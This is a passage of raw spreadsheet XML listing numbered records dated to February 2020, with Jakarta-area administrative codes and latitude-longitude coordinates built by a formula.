    <row r="1385" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1385">
        <v>110389</v>
      </c>
      <c r="B1385" s="1">
        <v>43885</v>
      </c>
      <c r="C1385">
        <v>1</v>
      </c>
      <c r="D1385" t="s">
        <v>2648</v>
      </c>
      <c r="E1385" t="s">
        <v>23</v>
      </c>
      <c r="G1385" t="s">
        <v>2819</v>
      </c>
      <c r="H1385" t="s">
        <v>26</v>
      </c>
      <c r="J1385" t="s">
        <v>2820</v>
      </c>
      <c r="L1385" t="s">
        <v>2821</v>
      </c>
      <c r="M1385">
        <v>3171020006</v>
      </c>
      <c r="N1385">
        <v>3171020</v>
      </c>
      <c r="O1385">
        <v>3171</v>
      </c>
      <c r="P1385">
        <v>31</v>
      </c>
      <c r="Q1385" t="s">
        <v>499</v>
      </c>
      <c r="R1385" t="s">
        <v>484</v>
      </c>
      <c r="S1385" t="s">
        <v>108</v>
      </c>
      <c r="T1385" t="s">
        <v>33</v>
      </c>
      <c r="U1385" s="5">
        <v>10682462</v>
      </c>
      <c r="V1385" s="5" t="s">
        <v>15086</v>
      </c>
      <c r="W1385" s="5">
        <v>-627127</v>
      </c>
      <c r="X1385" t="s">
        <v>18892</v>
      </c>
      <c r="Y1385" t="str">
        <f t="shared" si="21"/>
        <v>-6.27127,106.82462</v>
      </c>
    </row>
    <row r="1386" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1386">
        <v>110390</v>
      </c>
      <c r="B1386" s="1">
        <v>43885</v>
      </c>
      <c r="C1386">
        <v>1</v>
      </c>
      <c r="D1386" t="s">
        <v>2648</v>
      </c>
      <c r="E1386" t="s">
        <v>23</v>
      </c>
      <c r="G1386" t="s">
        <v>2805</v>
      </c>
      <c r="H1386" t="s">
        <v>26</v>
      </c>
      <c r="J1386" t="s">
        <v>2806</v>
      </c>
      <c r="L1386" t="s">
        <v>2807</v>
      </c>
      <c r="M1386">
        <v>3171010004</v>
      </c>
      <c r="N1386">
        <v>3171010</v>
      </c>
      <c r="O1386">
        <v>3171</v>
      </c>
      <c r="P1386">
        <v>31</v>
      </c>
      <c r="Q1386" t="s">
        <v>264</v>
      </c>
      <c r="R1386" t="s">
        <v>264</v>
      </c>
      <c r="S1386" t="s">
        <v>108</v>
      </c>
      <c r="T1386" t="s">
        <v>33</v>
      </c>
      <c r="U1386" s="5">
        <v>10681863</v>
      </c>
      <c r="V1386" s="5" t="s">
        <v>15081</v>
      </c>
      <c r="W1386" s="5">
        <v>-633230</v>
      </c>
      <c r="X1386" t="s">
        <v>18887</v>
      </c>
      <c r="Y1386" t="str">
        <f t="shared" si="21"/>
        <v>-6.33230,106.81863</v>
      </c>
    </row>
    <row r="1387" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1387">
        <v>110391</v>
      </c>
      <c r="B1387" s="1">
        <v>43885</v>
      </c>
      <c r="C1387">
        <v>1</v>
      </c>
      <c r="D1387" t="s">
        <v>2648</v>
      </c>
      <c r="E1387" t="s">
        <v>23</v>
      </c>
      <c r="G1387" t="s">
        <v>2847</v>
      </c>
      <c r="H1387" t="s">
        <v>26</v>
      </c>
      <c r="J1387" t="s">
        <v>2848</v>
      </c>
      <c r="L1387" t="s">
        <v>2849</v>
      </c>
      <c r="M1387">
        <v>3173020005</v>
      </c>
      <c r="N1387">
        <v>3173020</v>
      </c>
      <c r="O1387">
        <v>3173</v>
      </c>
      <c r="P1387">
        <v>31</v>
      </c>
      <c r="Q1387" t="s">
        <v>2041</v>
      </c>
      <c r="R1387" t="s">
        <v>179</v>
      </c>
      <c r="S1387" t="s">
        <v>62</v>
      </c>
      <c r="T1387" t="s">
        <v>33</v>
      </c>
      <c r="U1387" s="5">
        <v>10683286</v>
      </c>
      <c r="V1387" s="5" t="s">
        <v>15095</v>
      </c>
      <c r="W1387" s="5">
        <v>-618401</v>
      </c>
      <c r="X1387" t="s">
        <v>18901</v>
      </c>
      <c r="Y1387" t="str">
        <f t="shared" si="21"/>
        <v>-6.18401,106.83286</v>
      </c>
    </row>
    <row r="1388" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1388">
        <v>110392</v>
      </c>
      <c r="B1388" s="1">
        <v>43885</v>
      </c>
      <c r="C1388">
        <v>1</v>
      </c>
      <c r="D1388" t="s">
        <v>2648</v>
      </c>
      <c r="E1388" t="s">
        <v>23</v>
      </c>
      <c r="G1388" t="s">
        <v>2850</v>
      </c>
      <c r="H1388" t="s">
        <v>26</v>
      </c>
      <c r="J1388" t="s">
        <v>2851</v>
      </c>
      <c r="L1388" t="s">
        <v>2852</v>
      </c>
      <c r="M1388">
        <v>3172080006</v>
      </c>
      <c r="N1388">
        <v>3172080</v>
      </c>
      <c r="O1388">
        <v>3172</v>
      </c>
      <c r="P1388">
        <v>31</v>
      </c>
      <c r="Q1388" t="s">
        <v>2853</v>
      </c>
      <c r="R1388" t="s">
        <v>141</v>
      </c>
      <c r="S1388" t="s">
        <v>49</v>
      </c>
      <c r="T1388" t="s">
        <v>33</v>
      </c>
      <c r="U1388" s="5">
        <v>10693790</v>
      </c>
      <c r="V1388" s="5" t="s">
        <v>15096</v>
      </c>
      <c r="W1388" s="5">
        <v>-615480</v>
      </c>
      <c r="X1388" t="s">
        <v>18902</v>
      </c>
      <c r="Y1388" t="str">
        <f t="shared" si="21"/>
        <v>-6.15480,106.93790</v>
      </c>
    </row>
    <row r="1389" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1389">
        <v>110393</v>
      </c>
      <c r="B1389" s="1">
        <v>43885</v>
      </c>
      <c r="C1389">
        <v>1</v>
      </c>
      <c r="D1389" t="s">
        <v>2648</v>
      </c>
      <c r="E1389" t="s">
        <v>23</v>
      </c>
      <c r="G1389" t="s">
        <v>2844</v>
      </c>
      <c r="H1389" t="s">
        <v>26</v>
      </c>
      <c r="J1389" t="s">
        <v>2845</v>
      </c>
      <c r="L1389" t="s">
        <v>2846</v>
      </c>
      <c r="M1389">
        <v>3172070003</v>
      </c>
      <c r="N1389">
        <v>3172070</v>
      </c>
      <c r="O1389">
        <v>3172</v>
      </c>
      <c r="P1389">
        <v>31</v>
      </c>
      <c r="Q1389" t="s">
        <v>2659</v>
      </c>
      <c r="R1389" t="s">
        <v>128</v>
      </c>
      <c r="S1389" t="s">
        <v>49</v>
      </c>
      <c r="T1389" t="s">
        <v>33</v>
      </c>
      <c r="U1389" s="5">
        <v>10693025</v>
      </c>
      <c r="V1389" s="5" t="s">
        <v>15094</v>
      </c>
      <c r="W1389" s="5">
        <v>-623280</v>
      </c>
      <c r="X1389" t="s">
        <v>18900</v>
      </c>
      <c r="Y1389" t="str">
        <f t="shared" si="21"/>
        <v>-6.23280,106.93025</v>
      </c>
    </row>
    <row r="1390" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1390">
        <v>110394</v>
      </c>
      <c r="B1390" s="1">
        <v>43885</v>
      </c>
      <c r="C1390">
        <v>1</v>
      </c>
      <c r="D1390" t="s">
        <v>2648</v>
      </c>
      <c r="E1390" t="s">
        <v>23</v>
      </c>
      <c r="G1390" t="s">
        <v>2829</v>
      </c>
      <c r="H1390" t="s">
        <v>26</v>
      </c>
      <c r="J1390" t="s">
        <v>2830</v>
      </c>
      <c r="L1390" t="s">
        <v>2831</v>
      </c>
      <c r="M1390">
        <v>3172060003</v>
      </c>
      <c r="N1390">
        <v>3172060</v>
      </c>
      <c r="O1390">
        <v>3172</v>
      </c>
      <c r="P1390">
        <v>31</v>
      </c>
      <c r="Q1390" t="s">
        <v>2832</v>
      </c>
      <c r="R1390" t="s">
        <v>48</v>
      </c>
      <c r="S1390" t="s">
        <v>49</v>
      </c>
      <c r="T1390" t="s">
        <v>33</v>
      </c>
      <c r="U1390" s="5">
        <v>10687841</v>
      </c>
      <c r="V1390" s="5" t="s">
        <v>15089</v>
      </c>
      <c r="W1390" s="5">
        <v>-622532</v>
      </c>
      <c r="X1390" t="s">
        <v>18895</v>
      </c>
      <c r="Y1390" t="str">
        <f t="shared" si="21"/>
        <v>-6.22532,106.87841</v>
      </c>
    </row>
    <row r="1391" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1391">
        <v>110395</v>
      </c>
      <c r="B1391" s="1">
        <v>43885</v>
      </c>
      <c r="C1391">
        <v>1</v>
      </c>
      <c r="D1391" t="s">
        <v>2648</v>
      </c>
      <c r="E1391" t="s">
        <v>23</v>
      </c>
      <c r="G1391" t="s">
        <v>2827</v>
      </c>
      <c r="H1391" t="s">
        <v>26</v>
      </c>
      <c r="J1391" t="s">
        <v>2683</v>
      </c>
      <c r="L1391" t="s">
        <v>2828</v>
      </c>
      <c r="M1391">
        <v>3172070002</v>
      </c>
      <c r="N1391">
        <v>3172070</v>
      </c>
      <c r="O1391">
        <v>3172</v>
      </c>
      <c r="P1391">
        <v>31</v>
      </c>
      <c r="Q1391" t="s">
        <v>128</v>
      </c>
      <c r="R1391" t="s">
        <v>128</v>
      </c>
      <c r="S1391" t="s">
        <v>49</v>
      </c>
      <c r="T1391" t="s">
        <v>33</v>
      </c>
      <c r="U1391" s="5">
        <v>10691090</v>
      </c>
      <c r="V1391" s="5" t="s">
        <v>15088</v>
      </c>
      <c r="W1391" s="5">
        <v>-624559</v>
      </c>
      <c r="X1391" t="s">
        <v>18894</v>
      </c>
      <c r="Y1391" t="str">
        <f t="shared" si="21"/>
        <v>-6.24559,106.91090</v>
      </c>
    </row>
    <row r="1392" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1392">
        <v>110396</v>
      </c>
      <c r="B1392" s="1">
        <v>43885</v>
      </c>
      <c r="C1392">
        <v>1</v>
      </c>
      <c r="D1392" t="s">
        <v>2648</v>
      </c>
      <c r="E1392" t="s">
        <v>23</v>
      </c>
      <c r="G1392" t="s">
        <v>2867</v>
      </c>
      <c r="H1392" t="s">
        <v>26</v>
      </c>
      <c r="J1392" t="s">
        <v>2868</v>
      </c>
      <c r="L1392" t="s">
        <v>2869</v>
      </c>
      <c r="M1392">
        <v>3172080001</v>
      </c>
      <c r="N1392">
        <v>3172080</v>
      </c>
      <c r="O1392">
        <v>3172</v>
      </c>
      <c r="P1392">
        <v>31</v>
      </c>
      <c r="Q1392" t="s">
        <v>48</v>
      </c>
      <c r="R1392" t="s">
        <v>141</v>
      </c>
      <c r="S1392" t="s">
        <v>49</v>
      </c>
      <c r="T1392" t="s">
        <v>33</v>
      </c>
      <c r="U1392" s="5">
        <v>10690446</v>
      </c>
      <c r="V1392" s="5" t="s">
        <v>15101</v>
      </c>
      <c r="W1392" s="5">
        <v>-621175</v>
      </c>
      <c r="X1392" t="s">
        <v>18906</v>
      </c>
      <c r="Y1392" t="str">
        <f t="shared" si="21"/>
        <v>-6.21175,106.90446</v>
      </c>
    </row>
    <row r="1393" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1393">
        <v>110397</v>
      </c>
      <c r="B1393" s="1">
        <v>43885</v>
      </c>
      <c r="C1393">
        <v>1</v>
      </c>
      <c r="D1393" t="s">
        <v>2648</v>
      </c>
      <c r="E1393" t="s">
        <v>23</v>
      </c>
      <c r="G1393" t="s">
        <v>2884</v>
      </c>
      <c r="H1393" t="s">
        <v>26</v>
      </c>
      <c r="J1393" t="s">
        <v>2434</v>
      </c>
      <c r="L1393" t="s">
        <v>2885</v>
      </c>
      <c r="M1393">
        <v>3172080001</v>
      </c>
      <c r="N1393">
        <v>3172080</v>
      </c>
      <c r="O1393">
        <v>3172</v>
      </c>
      <c r="P1393">
        <v>31</v>
      </c>
      <c r="Q1393" t="s">
        <v>48</v>
      </c>
      <c r="R1393" t="s">
        <v>141</v>
      </c>
      <c r="S1393" t="s">
        <v>49</v>
      </c>
      <c r="T1393" t="s">
        <v>33</v>
      </c>
      <c r="U1393" s="5">
        <v>10690810</v>
      </c>
      <c r="V1393" s="5" t="s">
        <v>15107</v>
      </c>
      <c r="W1393" s="5">
        <v>-619988</v>
      </c>
      <c r="X1393" t="s">
        <v>18912</v>
      </c>
      <c r="Y1393" t="str">
        <f t="shared" si="21"/>
        <v>-6.19988,106.90810</v>
      </c>
    </row>
    <row r="1394" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1394">
        <v>110398</v>
      </c>
      <c r="B1394" s="1">
        <v>43885</v>
      </c>
      <c r="C1394">
        <v>1</v>
      </c>
      <c r="D1394" t="s">
        <v>2648</v>
      </c>
      <c r="E1394" t="s">
        <v>23</v>
      </c>
      <c r="G1394" t="s">
        <v>2836</v>
      </c>
      <c r="H1394" t="s">
        <v>26</v>
      </c>
      <c r="J1394" t="s">
        <v>2837</v>
      </c>
      <c r="L1394" t="s">
        <v>2838</v>
      </c>
      <c r="M1394">
        <v>3172060004</v>
      </c>
      <c r="N1394">
        <v>3172060</v>
      </c>
      <c r="O1394">
        <v>3172</v>
      </c>
      <c r="P1394">
        <v>31</v>
      </c>
      <c r="Q1394" t="s">
        <v>47</v>
      </c>
      <c r="R1394" t="s">
        <v>48</v>
      </c>
      <c r="S1394" t="s">
        <v>49</v>
      </c>
      <c r="T1394" t="s">
        <v>33</v>
      </c>
      <c r="U1394" s="5">
        <v>10688835</v>
      </c>
      <c r="V1394" s="5" t="s">
        <v>15091</v>
      </c>
      <c r="W1394" s="5">
        <v>-622305</v>
      </c>
      <c r="X1394" t="s">
        <v>18897</v>
      </c>
      <c r="Y1394" t="str">
        <f t="shared" si="21"/>
        <v>-6.22305,106.88835</v>
      </c>
    </row>
    <row r="1395" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1395">
        <v>110399</v>
      </c>
      <c r="B1395" s="1">
        <v>43885</v>
      </c>
      <c r="C1395">
        <v>1</v>
      </c>
      <c r="D1395" t="s">
        <v>2648</v>
      </c>
      <c r="E1395" t="s">
        <v>23</v>
      </c>
      <c r="G1395" t="s">
        <v>2833</v>
      </c>
      <c r="H1395" t="s">
        <v>26</v>
      </c>
      <c r="J1395" t="s">
        <v>2834</v>
      </c>
      <c r="L1395" t="s">
        <v>2835</v>
      </c>
      <c r="M1395">
        <v>3175050003</v>
      </c>
      <c r="N1395">
        <v>3175050</v>
      </c>
      <c r="O1395">
        <v>3175</v>
      </c>
      <c r="P1395">
        <v>31</v>
      </c>
      <c r="Q1395" t="s">
        <v>1740</v>
      </c>
      <c r="R1395" t="s">
        <v>1013</v>
      </c>
      <c r="S1395" t="s">
        <v>547</v>
      </c>
      <c r="T1395" t="s">
        <v>33</v>
      </c>
      <c r="U1395" s="5">
        <v>10691950</v>
      </c>
      <c r="V1395" s="5" t="s">
        <v>15090</v>
      </c>
      <c r="W1395" s="5">
        <v>-616536</v>
      </c>
      <c r="X1395" t="s">
        <v>18896</v>
      </c>
      <c r="Y1395" t="str">
        <f t="shared" si="21"/>
        <v>-6.16536,106.91950</v>
      </c>
    </row>
    <row r="1396" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1396">
        <v>110400</v>
      </c>
      <c r="B1396" s="1">
        <v>43885</v>
      </c>
      <c r="C1396">
        <v>1</v>
      </c>
      <c r="D1396" t="s">
        <v>2648</v>
      </c>
      <c r="E1396" t="s">
        <v>23</v>
      </c>
      <c r="G1396" t="s">
        <v>2841</v>
      </c>
      <c r="H1396" t="s">
        <v>26</v>
      </c>
      <c r="J1396" t="s">
        <v>2842</v>
      </c>
      <c r="L1396" t="s">
        <v>2843</v>
      </c>
      <c r="M1396">
        <v>3171070005</v>
      </c>
      <c r="N1396">
        <v>3171070</v>
      </c>
      <c r="O1396">
        <v>3171</v>
      </c>
      <c r="P1396">
        <v>31</v>
      </c>
      <c r="Q1396" t="s">
        <v>218</v>
      </c>
      <c r="R1396" t="s">
        <v>121</v>
      </c>
      <c r="S1396" t="s">
        <v>108</v>
      </c>
      <c r="T1396" t="s">
        <v>33</v>
      </c>
      <c r="U1396" s="5">
        <v>10681822</v>
      </c>
      <c r="V1396" s="5" t="s">
        <v>15093</v>
      </c>
      <c r="W1396" s="5">
        <v>-623764</v>
      </c>
      <c r="X1396" t="s">
        <v>18899</v>
      </c>
      <c r="Y1396" t="str">
        <f t="shared" si="21"/>
        <v>-6.23764,106.81822</v>
      </c>
    </row>
    <row r="1397" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1397">
        <v>110401</v>
      </c>
      <c r="B1397" s="1">
        <v>43885</v>
      </c>
      <c r="C1397">
        <v>1</v>
      </c>
      <c r="D1397" t="s">
        <v>2648</v>
      </c>
      <c r="E1397" t="s">
        <v>23</v>
      </c>
      <c r="G1397" t="s">
        <v>2839</v>
      </c>
      <c r="H1397" t="s">
        <v>26</v>
      </c>
      <c r="J1397" t="s">
        <v>2740</v>
      </c>
      <c r="L1397" t="s">
        <v>2840</v>
      </c>
      <c r="M1397">
        <v>3173070003</v>
      </c>
      <c r="N1397">
        <v>3173070</v>
      </c>
      <c r="O1397">
        <v>3173</v>
      </c>
      <c r="P1397">
        <v>31</v>
      </c>
      <c r="Q1397" t="s">
        <v>520</v>
      </c>
      <c r="R1397" t="s">
        <v>323</v>
      </c>
      <c r="S1397" t="s">
        <v>62</v>
      </c>
      <c r="T1397" t="s">
        <v>33</v>
      </c>
      <c r="U1397" s="5">
        <v>10683360</v>
      </c>
      <c r="V1397" s="5" t="s">
        <v>15092</v>
      </c>
      <c r="W1397" s="5">
        <v>-615220</v>
      </c>
      <c r="X1397" t="s">
        <v>18898</v>
      </c>
      <c r="Y1397" t="str">
        <f t="shared" si="21"/>
        <v>-6.15220,106.83360</v>
      </c>
    </row>
    <row r="1398" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1398">
        <v>110402</v>
      </c>
      <c r="B1398" s="1">
        <v>43885</v>
      </c>
      <c r="C1398">
        <v>1</v>
      </c>
      <c r="D1398" t="s">
        <v>2648</v>
      </c>
      <c r="E1398" t="s">
        <v>23</v>
      </c>
      <c r="G1398" t="s">
        <v>2859</v>
      </c>
      <c r="H1398" t="s">
        <v>26</v>
      </c>
      <c r="J1398" t="s">
        <v>2860</v>
      </c>
      <c r="L1398" t="s">
        <v>2861</v>
      </c>
      <c r="M1398">
        <v>3174080001</v>
      </c>
      <c r="N1398">
        <v>3174080</v>
      </c>
      <c r="O1398">
        <v>3174</v>
      </c>
      <c r="P1398">
        <v>31</v>
      </c>
      <c r="Q1398" t="s">
        <v>694</v>
      </c>
      <c r="R1398" t="s">
        <v>695</v>
      </c>
      <c r="S1398" t="s">
        <v>32</v>
      </c>
      <c r="T1398" t="s">
        <v>33</v>
      </c>
      <c r="U1398" s="5">
        <v>10669933</v>
      </c>
      <c r="V1398" s="5" t="s">
        <v>15098</v>
      </c>
      <c r="W1398" s="5">
        <v>-617200</v>
      </c>
      <c r="X1398" t="s">
        <v>18904</v>
      </c>
      <c r="Y1398" t="str">
        <f t="shared" si="21"/>
        <v>-6.17200,106.69933</v>
      </c>
    </row>
    <row r="1399" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1399">
        <v>110571</v>
      </c>
      <c r="B1399" s="1">
        <v>43885</v>
      </c>
      <c r="C1399">
        <v>1</v>
      </c>
      <c r="D1399" t="s">
        <v>2648</v>
      </c>
      <c r="E1399" t="s">
        <v>23</v>
      </c>
      <c r="G1399" t="s">
        <v>2854</v>
      </c>
      <c r="H1399" t="s">
        <v>26</v>
      </c>
      <c r="J1399" t="s">
        <v>2679</v>
      </c>
      <c r="L1399" t="s">
        <v>2855</v>
      </c>
      <c r="M1399">
        <v>3172090001</v>
      </c>
      <c r="N1399">
        <v>3172090</v>
      </c>
      <c r="O1399">
        <v>3172</v>
      </c>
      <c r="P1399">
        <v>31</v>
      </c>
      <c r="Q1399" t="s">
        <v>2681</v>
      </c>
      <c r="R1399" t="s">
        <v>890</v>
      </c>
      <c r="S1399" t="s">
        <v>49</v>
      </c>
      <c r="T1399" t="s">
        <v>33</v>
      </c>
      <c r="U1399" s="5">
        <v>10687637</v>
      </c>
      <c r="V1399" s="5" t="s">
        <v>15038</v>
      </c>
      <c r="W1399" s="5">
        <v>-620737</v>
      </c>
      <c r="X1399" t="s">
        <v>18843</v>
      </c>
      <c r="Y1399" t="str">
        <f t="shared" si="21"/>
        <v>-6.20737,106.87637</v>
      </c>
    </row>
    <row r="1400" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1400">
        <v>110717</v>
      </c>
      <c r="B1400" s="1">
        <v>43885</v>
      </c>
      <c r="C1400">
        <v>1</v>
      </c>
      <c r="D1400" t="s">
        <v>2648</v>
      </c>
      <c r="E1400" t="s">
        <v>23</v>
      </c>
      <c r="G1400" t="s">
        <v>2878</v>
      </c>
      <c r="H1400" t="s">
        <v>26</v>
      </c>
      <c r="J1400" t="s">
        <v>2879</v>
      </c>
      <c r="L1400" t="s">
        <v>2794</v>
      </c>
      <c r="M1400">
        <v>3172070004</v>
      </c>
      <c r="N1400">
        <v>3172070</v>
      </c>
      <c r="O1400">
        <v>3172</v>
      </c>
      <c r="P1400">
        <v>31</v>
      </c>
      <c r="Q1400" t="s">
        <v>2880</v>
      </c>
      <c r="R1400" t="s">
        <v>128</v>
      </c>
      <c r="S1400" t="s">
        <v>49</v>
      </c>
      <c r="T1400" t="s">
        <v>33</v>
      </c>
      <c r="U1400" s="5">
        <v>10694335</v>
      </c>
      <c r="V1400" s="5" t="s">
        <v>15105</v>
      </c>
      <c r="W1400" s="5">
        <v>-622072</v>
      </c>
      <c r="X1400" t="s">
        <v>18910</v>
      </c>
      <c r="Y1400" t="str">
        <f t="shared" si="21"/>
        <v>-6.22072,106.94335</v>
      </c>
    </row>
    <row r="1401" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1401">
        <v>110719</v>
      </c>
      <c r="B1401" s="1">
        <v>43885</v>
      </c>
      <c r="C1401">
        <v>1</v>
      </c>
      <c r="D1401" t="s">
        <v>2648</v>
      </c>
      <c r="E1401" t="s">
        <v>23</v>
      </c>
      <c r="G1401" t="s">
        <v>2870</v>
      </c>
      <c r="H1401" t="s">
        <v>26</v>
      </c>
      <c r="J1401" t="s">
        <v>2871</v>
      </c>
      <c r="L1401" t="s">
        <v>2872</v>
      </c>
      <c r="M1401">
        <v>3172080003</v>
      </c>
      <c r="N1401">
        <v>3172080</v>
      </c>
      <c r="O1401">
        <v>3172</v>
      </c>
      <c r="P1401">
        <v>31</v>
      </c>
      <c r="Q1401" t="s">
        <v>2250</v>
      </c>
      <c r="R1401" t="s">
        <v>141</v>
      </c>
      <c r="S1401" t="s">
        <v>49</v>
      </c>
      <c r="T1401" t="s">
        <v>33</v>
      </c>
      <c r="U1401" s="5">
        <v>10695252</v>
      </c>
      <c r="V1401" s="5" t="s">
        <v>15102</v>
      </c>
      <c r="W1401" s="5">
        <v>-619942</v>
      </c>
      <c r="X1401" t="s">
        <v>18907</v>
      </c>
      <c r="Y1401" t="str">
        <f t="shared" si="21"/>
        <v>-6.19942,106.95252</v>
      </c>
    </row>
    <row r="1402" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1402">
        <v>110721</v>
      </c>
      <c r="B1402" s="1">
        <v>43885</v>
      </c>
      <c r="C1402">
        <v>1</v>
      </c>
      <c r="D1402" t="s">
        <v>2648</v>
      </c>
      <c r="E1402" t="s">
        <v>23</v>
      </c>
      <c r="G1402" t="s">
        <v>2886</v>
      </c>
      <c r="H1402" t="s">
        <v>26</v>
      </c>
      <c r="J1402" t="s">
        <v>801</v>
      </c>
      <c r="L1402" t="s">
        <v>2887</v>
      </c>
      <c r="M1402">
        <v>3174010006</v>
      </c>
      <c r="N1402">
        <v>3174010</v>
      </c>
      <c r="O1402">
        <v>3174</v>
      </c>
      <c r="P1402">
        <v>31</v>
      </c>
      <c r="Q1402" t="s">
        <v>268</v>
      </c>
      <c r="R1402" t="s">
        <v>69</v>
      </c>
      <c r="S1402" t="s">
        <v>32</v>
      </c>
      <c r="T1402" t="s">
        <v>33</v>
      </c>
      <c r="U1402" s="5">
        <v>10675293</v>
      </c>
      <c r="V1402" s="5" t="s">
        <v>15108</v>
      </c>
      <c r="W1402" s="5">
        <v>-615884</v>
      </c>
      <c r="X1402" t="s">
        <v>18913</v>
      </c>
      <c r="Y1402" t="str">
        <f t="shared" si="21"/>
        <v>-6.15884,106.75293</v>
      </c>
    </row>
    <row r="1403" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1403">
        <v>110723</v>
      </c>
      <c r="B1403" s="1">
        <v>43885</v>
      </c>
      <c r="C1403">
        <v>1</v>
      </c>
      <c r="D1403" t="s">
        <v>2648</v>
      </c>
      <c r="E1403" t="s">
        <v>23</v>
      </c>
      <c r="G1403" t="s">
        <v>2881</v>
      </c>
      <c r="H1403" t="s">
        <v>26</v>
      </c>
      <c r="J1403" t="s">
        <v>2882</v>
      </c>
      <c r="L1403" t="s">
        <v>2883</v>
      </c>
      <c r="M1403">
        <v>3175060001</v>
      </c>
      <c r="N1403">
        <v>3175060</v>
      </c>
      <c r="O1403">
        <v>3175</v>
      </c>
      <c r="P1403">
        <v>31</v>
      </c>
      <c r="Q1403" t="s">
        <v>2278</v>
      </c>
      <c r="R1403" t="s">
        <v>2279</v>
      </c>
      <c r="S1403" t="s">
        <v>547</v>
      </c>
      <c r="T1403" t="s">
        <v>33</v>
      </c>
      <c r="U1403" s="5">
        <v>10692181</v>
      </c>
      <c r="V1403" s="5" t="s">
        <v>15106</v>
      </c>
      <c r="W1403" s="5">
        <v>-615235</v>
      </c>
      <c r="X1403" t="s">
        <v>18911</v>
      </c>
      <c r="Y1403" t="str">
        <f t="shared" si="21"/>
        <v>-6.15235,106.92181</v>
      </c>
    </row>
    <row r="1404" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1404">
        <v>110724</v>
      </c>
      <c r="B1404" s="1">
        <v>43885</v>
      </c>
      <c r="C1404">
        <v>1</v>
      </c>
      <c r="D1404" t="s">
        <v>2648</v>
      </c>
      <c r="E1404" t="s">
        <v>23</v>
      </c>
      <c r="G1404" t="s">
        <v>2856</v>
      </c>
      <c r="H1404" t="s">
        <v>26</v>
      </c>
      <c r="J1404" t="s">
        <v>2857</v>
      </c>
      <c r="L1404" t="s">
        <v>2858</v>
      </c>
      <c r="M1404">
        <v>3175060001</v>
      </c>
      <c r="N1404">
        <v>3175060</v>
      </c>
      <c r="O1404">
        <v>3175</v>
      </c>
      <c r="P1404">
        <v>31</v>
      </c>
      <c r="Q1404" t="s">
        <v>2278</v>
      </c>
      <c r="R1404" t="s">
        <v>2279</v>
      </c>
      <c r="S1404" t="s">
        <v>547</v>
      </c>
      <c r="T1404" t="s">
        <v>33</v>
      </c>
      <c r="U1404" s="5">
        <v>10692334</v>
      </c>
      <c r="V1404" s="5" t="s">
        <v>15097</v>
      </c>
      <c r="W1404" s="5">
        <v>-614934</v>
      </c>
      <c r="X1404" t="s">
        <v>18903</v>
      </c>
      <c r="Y1404" t="str">
        <f t="shared" si="21"/>
        <v>-6.14934,106.92334</v>
      </c>
    </row>
    <row r="1405" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1405">
        <v>110789</v>
      </c>
      <c r="B1405" s="1">
        <v>43885</v>
      </c>
      <c r="C1405">
        <v>1</v>
      </c>
      <c r="D1405" t="s">
        <v>2648</v>
      </c>
      <c r="E1405" t="s">
        <v>23</v>
      </c>
      <c r="G1405" t="s">
        <v>2875</v>
      </c>
      <c r="H1405" t="s">
        <v>26</v>
      </c>
      <c r="J1405" t="s">
        <v>2876</v>
      </c>
      <c r="L1405" t="s">
        <v>2877</v>
      </c>
      <c r="M1405">
        <v>3172100006</v>
      </c>
      <c r="N1405">
        <v>3172100</v>
      </c>
      <c r="O1405">
        <v>3172</v>
      </c>
      <c r="P1405">
        <v>31</v>
      </c>
      <c r="Q1405" t="s">
        <v>1435</v>
      </c>
      <c r="R1405" t="s">
        <v>1436</v>
      </c>
      <c r="S1405" t="s">
        <v>49</v>
      </c>
      <c r="T1405" t="s">
        <v>33</v>
      </c>
      <c r="U1405" s="5">
        <v>10687236</v>
      </c>
      <c r="V1405" s="5" t="s">
        <v>15104</v>
      </c>
      <c r="W1405" s="5">
        <v>-619275</v>
      </c>
      <c r="X1405" t="s">
        <v>18909</v>
      </c>
      <c r="Y1405" t="str">
        <f t="shared" si="21"/>
        <v>-6.19275,106.87236</v>
      </c>
    </row>
    <row r="1406" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1406">
        <v>110790</v>
      </c>
      <c r="B1406" s="1">
        <v>43885</v>
      </c>
      <c r="C1406">
        <v>1</v>
      </c>
      <c r="D1406" t="s">
        <v>2648</v>
      </c>
      <c r="E1406" t="s">
        <v>23</v>
      </c>
      <c r="G1406" t="s">
        <v>2888</v>
      </c>
      <c r="H1406" t="s">
        <v>26</v>
      </c>
      <c r="J1406" t="s">
        <v>2876</v>
      </c>
      <c r="L1406" t="s">
        <v>2889</v>
      </c>
      <c r="M1406">
        <v>3172100006</v>
      </c>
      <c r="N1406">
        <v>3172100</v>
      </c>
      <c r="O1406">
        <v>3172</v>
      </c>
      <c r="P1406">
        <v>31</v>
      </c>
      <c r="Q1406" t="s">
        <v>1435</v>
      </c>
      <c r="R1406" t="s">
        <v>1436</v>
      </c>
      <c r="S1406" t="s">
        <v>49</v>
      </c>
      <c r="T1406" t="s">
        <v>33</v>
      </c>
      <c r="U1406" s="5">
        <v>10687322</v>
      </c>
      <c r="V1406" s="5" t="s">
        <v>15109</v>
      </c>
      <c r="W1406" s="5">
        <v>-619316</v>
      </c>
      <c r="X1406" t="s">
        <v>18914</v>
      </c>
      <c r="Y1406" t="str">
        <f t="shared" si="21"/>
        <v>-6.19316,106.87322</v>
      </c>
    </row>
    <row r="1407" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1407">
        <v>110792</v>
      </c>
      <c r="B1407" s="1">
        <v>43885</v>
      </c>
      <c r="C1407">
        <v>1</v>
      </c>
